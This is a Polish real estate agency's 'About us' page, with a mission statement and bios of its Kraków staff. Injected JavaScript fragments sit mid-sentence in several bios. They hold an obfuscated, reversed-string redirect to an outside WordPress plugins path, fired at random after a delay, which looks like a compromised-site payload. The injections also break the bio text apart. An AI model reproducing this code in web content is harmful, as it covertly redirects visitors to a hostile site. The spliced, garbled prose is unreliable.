O NAS

Biuro nieruchomości Helton to jedna z najdynamiczniej rozwijających się krakowskich firm na rynku nieruchomości. Jesteśmy znani z wysokiej jakości usług, profesjonalizmu i pełnego zaangażowania w pracę, którą wykonujemy. Nasze biuro specjalizuje się w wynajmie i sprzedaży nieruchomości w średnim i wysokim standardzie.
Dzięki doświadczeniu oraz doskonałej znajomości rynku nieruchomości jesteśmy w stanie zapewnić Państwu kompleksową obsługę transakcji. Cechuje nas indywidualne podejście do każdego klienta, dokładna diagnoza jego potrzeb, profesjonalizm i miła obsługa. Cieszymy się zaufaniem klientów i partnerów. To wszystko sprawia, że z nami szybko osiągniesz swój cel.

To wszystko sprawia, że Helton staje się ''pośrednikiem pierwszego wyboru''

Zapraszamy do współpracy.

MISJA

Naszą misją jest bycie liderem wynajmu, sprzedaży nieruchomości oraz zarządzania najmem w Krakowie.

NASZ ZESPÓŁ

Paweł Wałaszek

W krakowskiej branży pośredników w obrocie nieruchomościami pojawił się w 2012 roku, będąc jednym z najskuteczniejszych doradców, a następnie właścicielem własnego biura. Przeprowadził kilkaset transakcji na terenie całego Krakowa. Uczestnik wielu szkoleń i kursów, między innymi szkolenia ReCamp czy kursów organizowanych w ramach projektu „Zarządzanie Innowacją”. Obsługuje głównie nieruchomości PREMIUM, specjalizuje się w wynajmie apartamentów w wysokim standardzie zlokalizowanych na prestiżowych inwestycjach.

W branży nieruchomości z powodzeniem wykorzystuje swoje umiejętności interpersonalne. Przyjazna postawa oraz zaangażowanie są jedynymi z kluczy do jego sukcesu. Koncentruje się przede wszystkim na klientach i ich potrzebach, ich aktywną obsługę i budowanie długotrwałych relacji.

Faustyna Kowal

Faustyna toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to niezwykle ceniony specjalista ds. nieruchomości i lider wśród naszych agentów. Posiada bardzo duże doświadczenie przy wynajmie apartamentów oraz sprzedaży nieruchomości w Krakowie oraz w jego okolicach. Od lat cieszy się zaufaniem klientów, którzy powierzają jej swoje transakcje oraz plany dotyczące nieruchomości. Odbyła liczne szkolenia oraz kursy, dzięki którym jest jednym z najlepszych fachowców dostępnych na rynku. Potrafi szybko i skutecznie wyszukiwać najbardziej trafne oferty oraz propozycje dla swoich klientów. Ma na swoim koncie wiele dużych przedsięwzięć i ciągle doskonali swoje umiejętności – co sprawia, że jej klienci są obsługiwani według najwyższych standardów.Faustyna zaprasza do kontaktu wszelkie osoby potrzebującej fachowej i szybkiej pomocy przy wynajmie oraz sprzedaży wszelkiego rodzaju nieruchomości. Udzieli również profesjonalnego wsparcia przy zarządzaniu najmem.

Ewelina Łabno-Bieniek

Ewelina toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to osoba pełna pasji oraz optymizmu. Nieodłącznym elementem wizerunku Eweliny jest szczery uśmiech. W celu zapewnienia najwyższej jakości współpracy podnosi swoje kwalifikacje zawodowe uczestnicząc w licznych szkoleniach i kursach. Powierzone zadania wykonuje z pełnym zaangażowaniem. Klienci cenią jej wiedzę oraz doświadczenie w branży nieruchomości.

Katarzyna Flak

Katarzyna toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to pełen pasji office manager, który koordynuje działania agencji oraz dba o toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, aby współpraca z kontrahentami odbywała się w oparciu o najwyższą jakość obsługi klienta. Celem jej pracy jest zapewnianie właściwych standardów administracyjnych oraz urzędowych podejmowanych transakcji. Doskonale rozumie wszelkie potrzeby klientów działających na rynku nieruchomości, a ich pełne zadowolenie jest priorytetem jej codziennej pracy. Zaprasza do kontaktu wszelkie osoby poszukujące wysokiej jakości współpracy przy wynajmie, sprzedaży oraz zarządzaniu nieruchomościami.

 

 

 

Weronika Matuszyk

Katarzyna Dobosz

Sara Swaczyna

Izabela Pydyś

KONTAKT

    Projekt i wykonanie BrandOxygen